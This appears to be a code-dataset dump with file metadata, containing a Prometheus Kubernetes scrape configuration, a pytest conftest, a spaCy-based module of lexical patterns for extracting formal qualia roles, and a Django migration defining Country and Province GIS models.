' - bearer_token_file: /var/run/secrets/kubernetes.io/serviceaccount/token',
' job_name: operations-kubernetes-pods-long',
' kubernetes_sd_configs:',
' - role: pod',
' metric_relabel_configs:',
' - action: drop',
' regex: go_.*',
' source_labels:',
' - __name__',
' relabel_configs:',
' - action: keep',
" regex: 'true'",
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_scrape',
' - action: keep',
' regex: long',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_interval',
' - action: replace',
' regex: (.+)',
" replacement: 'false'",
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_port',
' target_label: __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - action: keep',
' regex: (false;.*)|(true;.*metrics)',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - __meta_kubernetes_pod_container_port_name',
' - action: replace',
' regex: true;(.+)',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - __meta_kubernetes_pod_container_port_number',
' target_label: __meta_kubernetes_pod_annotation_prometheus_io_port',
' - action: replace',
' regex: true;(.+)',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_filterport',
' - __meta_kubernetes_pod_container_name',
' target_label: kubernetes_container_name',
' - action: replace',
' regex: (.+)',
' source_labels:',
' - __meta_kubernetes_pod_annotation_prometheus_io_path',
' target_label: __metrics_path__',
' - action: replace',
' regex: ([^:]+)(?::\\d+)?;(\\d+)',
' replacement: $1:$2',
' separator: ;',
' source_labels:',
' - __address__',
' - __meta_kubernetes_pod_annotation_prometheus_io_port',
' target_label: __address__',
' - action: replace',
' regex: (.+);(.+);(.+);(.+)',
' replacement: /api/v1/namespaces/$1/pods/$2:$3/proxy$4',
' separator: ;',
' source_labels:',
' - __meta_kubernetes_namespace',
' - __meta_kubernetes_pod_name',
' - __meta_kubernetes_pod_annotation_prometheus_io_port',
' - __metrics_path__',
' target_label: __metrics_path__',
' - action: replace',
' source_labels:',
' - __address__',
' target_label: instance',
' - action: replace',
' replacement: kubernetes.default.svc:443',
' target_label: __address__',
' - action: labelmap',
' regex: __meta_kubernetes_pod_label_(.+)',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_namespace',
' target_label: kubernetes_namespace',
' - action: replace',
' source_labels:',
' - __meta_kubernetes_pod_name',
' target_label: kubernetes_pod_name',
' - action: replace',
" replacement: ''",
' target_label: pod_template_hash',
' - action: replace',
" replacement: ''",
' target_label: controller_revision_hash',
' - action: replace',
" replacement: ''",
' target_label: pod_template_generation',
' scheme: https',
' scrape_interval: 1h',
' tls_config:',
' ca_file: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt',
''
]
| 41.182684
| 93
| 0.542509
| 4,002
| 47,566
| 5.848076
| 0.033233
| 0.097505
| 0.05811
| 0.094428
| 0.982866
| 0.979961
| 0.978166
| 0.978166
| 0.978166
| 0.975859
| 0
| 0.006129
| 0.320817
| 47,566
| 1,154
| 94
| 41.218371
| 0.718319
| 0.001303
| 0
| 0.966028
| 0
| 0
| 0.80493
| 0.291783
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.001742
| 0
| 0.001742
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
17f0168590c83cfd1b5cce5574e82fd0752fab2f
| 193
|
py
|
Python
|
xndtools/kernel_generator/tests/conftest.py
|
xnd-project/xndtools
|
9478f31954091d861ce538ba278f7f888e23d19b
|
[
"BSD-3-Clause"
] | 3
|
2019-11-12T16:01:26.000Z
|
2020-06-27T19:27:27.000Z
|
xndtools/kernel_generator/tests/conftest.py
|
xnd-project/xndtools
|
9478f31954091d861ce538ba278f7f888e23d19b
|
[
"BSD-3-Clause"
] | 4
|
2018-04-25T17:12:43.000Z
|
2018-08-23T18:17:24.000Z
|
xndtools/kernel_generator/tests/conftest.py
|
xnd-project/xndtools
|
9478f31954091d861ce538ba278f7f888e23d19b
|
[
"BSD-3-Clause"
] | 6
|
2018-05-04T08:10:40.000Z
|
2019-03-19T10:00:21.000Z
|
# Importing gumath prior xndtools generated extension modules avoids
# the following exception:
# ImportError: libgumath.so.0: cannot open shared object file:...
import gumath # noqa: F401
| 32.166667
| 68
| 0.772021
| 24
| 193
| 6.208333
| 0.958333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02454
| 0.15544
| 193
| 5
| 69
| 38.6
| 0.889571
| 0.870466
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a4aa085f3d8fa8c536cbe79f9b70f0b4aeae858c
| 4,348
|
py
|
Python
|
src/formal_sequences.py
|
TillJohanndeiter/qualia-generator
|
65dcc7c3b8dc301dfee2b12c6824b2b8723651a0
|
[
"Unlicense"
] | null | null | null |
src/formal_sequences.py
|
TillJohanndeiter/qualia-generator
|
65dcc7c3b8dc301dfee2b12c6824b2b8723651a0
|
[
"Unlicense"
] | null | null | null |
src/formal_sequences.py
|
TillJohanndeiter/qualia-generator
|
65dcc7c3b8dc301dfee2b12c6824b2b8723651a0
|
[
"Unlicense"
] | null | null | null |
'''
Provide the semantic sequences for the role formal.
'''
from spacy.symbols import NOUN, VERB, conj, nmod, dobj, nsubj, xcomp
from spacy.tokens.doc import Doc
from src.semantic_sequence import SemanticSequence, to_bert_seq, MASK
from src.spacy_utils import ROOT, get_ancestor, get_child
class IsSemanticSequence(SemanticSequence):
def get_regular_expression(self, qualia_theorem: str) -> str:
return qualia_theorem + ' is'
def get_search_requests(self, qualia_theorem: str) -> str:
return 'a|an {} is a'.format(qualia_theorem)
def _handle_pattern_found(self, tokenized_seq: Doc, start: int, end: int):
qualia_theorem_token = tokenized_seq[start]
return get_ancestor(qualia_theorem_token, ROOT, NOUN)
class AndOther(SemanticSequence):
def get_regular_expression(self, qualia_theorem: str):
return qualia_theorem + '(,|) and other'
def get_search_requests(self, qualia_theorem: str) -> str:
return 'a|an {} and other'.format(qualia_theorem)
def _handle_pattern_found(self, tokenized_seq: Doc, start: int, end: int):
other_token = tokenized_seq[end]
return get_ancestor(other_token, conj, NOUN)
class OrOther(SemanticSequence):
def get_regular_expression(self, qualia_theorem: str):
return qualia_theorem + '(,|) or other'
def get_search_requests(self, qualia_theorem: str) -> str:
return 'a|an {} or other'.format(qualia_theorem)
def _handle_pattern_found(self, tokenized_seq: Doc, start: int, end: int):
other_token = tokenized_seq[end]
return get_ancestor(other_token, conj, NOUN)
class IsKindOf(SemanticSequence):
def get_regular_expression(self, qualia_theorem: str) -> str:
return qualia_theorem + ' is(\sa|) kind of'
def get_search_requests(self, qualia_theorem: str) -> str:
return 'a|an {} is kind of'.format(qualia_theorem)
def _handle_pattern_found(self, tokenized_seq: Doc, start: int, end: int):
of_token = tokenized_seq[end]
return get_ancestor(of_token, [nmod, ROOT], [NOUN])
class SuchAs(SemanticSequence):
def get_regular_expression(self, qualia_theorem: str):
return 'such as ' + qualia_theorem
def get_search_requests(self, qualia_theorem: str) -> str:
return self.get_regular_expression(qualia_theorem)
def get_bert_input(self, qualia_theorem: str) -> [str]:
return [to_bert_seq('{} such as {}'.format(MASK, qualia_theorem), qualia_theorem)]
def _handle_pattern_found(self, tokenized_seq: Doc, start: int, end: int):
qualia_theorem_token = tokenized_seq[end]
return get_ancestor(qualia_theorem_token, [dobj, nsubj], NOUN)
class OrOtherPlu(OrOther):
def get_search_requests(self, qualia_theorem: str) -> str:
return '{} or other'.format(qualia_theorem)
class AndOtherPlu(AndOther):
def get_search_requests(self, qualia_theorem: str) -> str:
return '{} and other'.format(qualia_theorem)
class Especially(SemanticSequence):
def get_regular_expression(self, qualia_theorem: str):
return 'especially ' + qualia_theorem
def get_search_requests(self, qualia_theorem: str) -> str:
return self.get_regular_expression(qualia_theorem)
def get_bert_input(self, qualia_theorem: str) -> [str]:
return [to_bert_seq('{} especially {}'.format(MASK, qualia_theorem), qualia_theorem)]
def _handle_pattern_found(self, tokenized_seq: Doc, start: int, end: int):
qualia_theorem_token = tokenized_seq[end]
verb_token = get_ancestor(qualia_theorem_token, [ROOT, xcomp], VERB)
return get_child(verb_token, dobj, NOUN)
class Including(SemanticSequence):
def get_regular_expression(self, qualia_theorem: str):
return 'including ' + qualia_theorem
def get_search_requests(self, qualia_theorem: str) -> str:
return self.get_regular_expression(qualia_theorem)
def get_bert_input(self, qualia_theorem: str) -> [str]:
return [to_bert_seq('{} including {}'.format(MASK, qualia_theorem), qualia_theorem)]
def _handle_pattern_found(self, tokenized_seq: Doc, start: int, end: int):
qualia_theorem_token = tokenized_seq[end]
verb_token = get_ancestor(qualia_theorem_token, [ROOT, xcomp], VERB)
return get_child(verb_token, dobj, NOUN)
| 35.064516
| 93
| 0.712971
| 568
| 4,348
| 5.163732
| 0.128521
| 0.217184
| 0.110126
| 0.12956
| 0.841118
| 0.817934
| 0.7985
| 0.780089
| 0.780089
| 0.780089
| 0
| 0
| 0.184223
| 4,348
| 123
| 94
| 35.349594
| 0.826896
| 0.01173
| 0
| 0.540541
| 0
| 0
| 0.04803
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.351351
| false
| 0
| 0.054054
| 0.256757
| 0.878378
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 10
|
10312dbe3512978e13698ac4c7fa7eee3ddc263d
| 3,530
|
py
|
Python
|
wtfapi/migrations/0003_country_province.py
|
luismasuelli/wherethefuck
|
6e68543a804c299be4362836c518e34f10029b48
|
[
"MIT"
] | 1
|
2019-11-18T15:02:16.000Z
|
2019-11-18T15:02:16.000Z
|
wtfapi/migrations/0003_country_province.py
|
luismasuelli/wherethefuck
|
6e68543a804c299be4362836c518e34f10029b48
|
[
"MIT"
] | null | null | null |
wtfapi/migrations/0003_country_province.py
|
luismasuelli/wherethefuck
|
6e68543a804c299be4362836c518e34f10029b48
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2.4 on 2019-12-02 22:12
from django.conf import settings
import django.contrib.gis.db.models.fields
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('wtfapi', '0002_auto_20190829_2241'),
]
operations = [
migrations.CreateModel(
name='Country',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_on', models.DateTimeField(auto_now_add=True, verbose_name='Created On')),
('updated_on', models.DateTimeField(auto_now=True, verbose_name='Updated On')),
('deleted', models.BooleanField(default=False, editable=False)),
('name', models.CharField(max_length=80, verbose_name='Name')),
('description', models.TextField(max_length=512, verbose_name='Description')),
('internal_notes', models.TextField(blank=True, help_text='These notes are only useful here, in the admin panel, and are never revealed as public data. Use this space to take all the notes you need about this POI.', null=True, verbose_name='Internal Notes')),
('boundaries', django.contrib.gis.db.models.fields.MultiPolygonField(srid=4326, verbose_name='Boundaries')),
('deleted_by', models.ForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),
('managers', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='managed_country_records', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'Country',
'verbose_name_plural': 'Countries',
},
),
migrations.CreateModel(
name='Province',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_on', models.DateTimeField(auto_now_add=True, verbose_name='Created On')),
('updated_on', models.DateTimeField(auto_now=True, verbose_name='Updated On')),
('deleted', models.BooleanField(default=False, editable=False)),
('name', models.CharField(max_length=80, verbose_name='Name')),
('description', models.TextField(max_length=512, verbose_name='Description')),
('internal_notes', models.TextField(blank=True, help_text='These notes are only useful here, in the admin panel, and are never revealed as public data. Use this space to take all the notes you need about this POI.', null=True, verbose_name='Internal Notes')),
('boundaries', django.contrib.gis.db.models.fields.MultiPolygonField(srid=4326, verbose_name='Boundaries')),
('country', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='provinces', to='wtfapi.Country')),
('deleted_by', models.ForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),
('managers', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='managed_province_records', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'Province',
'verbose_name_plural': 'Provinces',
},
),
]
| 63.035714
| 275
| 0.650425
| 408
| 3,530
| 5.458333
| 0.264706
| 0.088909
| 0.037719
| 0.059273
| 0.825326
| 0.825326
| 0.811855
| 0.811855
| 0.811855
| 0.768747
| 0
| 0.017805
| 0.220397
| 3,530
| 55
| 276
| 64.181818
| 0.791424
| 0.012748
| 0
| 0.571429
| 1
| 0.040816
| 0.234855
| 0.020098
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.081633
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.